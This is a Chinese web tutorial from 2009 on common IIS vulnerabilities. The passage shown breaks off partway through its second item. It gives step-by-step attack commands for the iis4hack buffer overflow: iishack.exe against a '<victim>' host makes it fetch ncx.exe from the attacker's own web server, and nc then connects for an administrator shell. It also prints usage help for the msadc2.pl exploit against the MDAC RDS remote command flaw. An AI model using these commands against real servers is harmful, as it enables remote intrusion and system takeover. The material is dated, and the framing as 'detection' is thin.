当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > IIS的十七个常见漏洞

安全防护
确保Linux安全的十招
打造安全IIS服务器之IIS FAQ
让虚拟主机免受FSO威胁
微软发布10月补丁包 7个补丁修补9个软件漏洞
杀软克星4天入侵10万电脑 被指最牛木马下载器
IIS vs.Apache: 哪个才是安全首选?
Windows环境下服务器监控软件的选择
确保你的分布式Windows应用的安全
Windows虚拟主机防范WEB SHELL
谨防视频宝宝病毒
信息服务器安全大比拼
ASP木马Webshell安全防范解决办法
如何追踪系统入侵者
配置安全的SCO UNIX网络系统
UNIX防止非法用户注册的技术
堵住域名和邮件的漏洞
教你几点对付DDoS攻击
网络服务器通用和专用保护方法
10个步骤有效的保护IIS Web服务器
巧用百度在线杀毒 查杀远程服务器病毒

安全防护 中的 IIS的十七个常见漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 42 ::
收藏到网摘: n/a

1. iis4hack缓冲溢出  
     主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序  在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器: 
                 
 c:>iishack.exe <victim> 80 <your web server>/ncx.exe 
                  
然后你就使用netcat来连接你要检测的服务器: 
                  
c:>nc <victim> 80  
 如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip 
                 
 2.msadc  
     IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help 
                  [quack@chat quack]$ perl msadc2.pl -h 
                  -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- 
                  Usage: msadc.pl -h <host> { -d <delay> -X -v } 
                  -h <host> = host you want to scan (ip or domain) 
                  -d <seconds> = delay between calls, default 1 second 
                  -X = dump Index Server path table, if available 
                  -N = query VbBusObj for NetBIOS name 
                  -V = use VbBusObj instead of ActiveDataFactory 
                  -v = verbose 
                  -e = external dictionary file for step 5 
                  -u <\hostsharefile> = use UNC file 
                  -w = Windows 95 instead of Windows NT 
                  -c = v1 compatibility (three step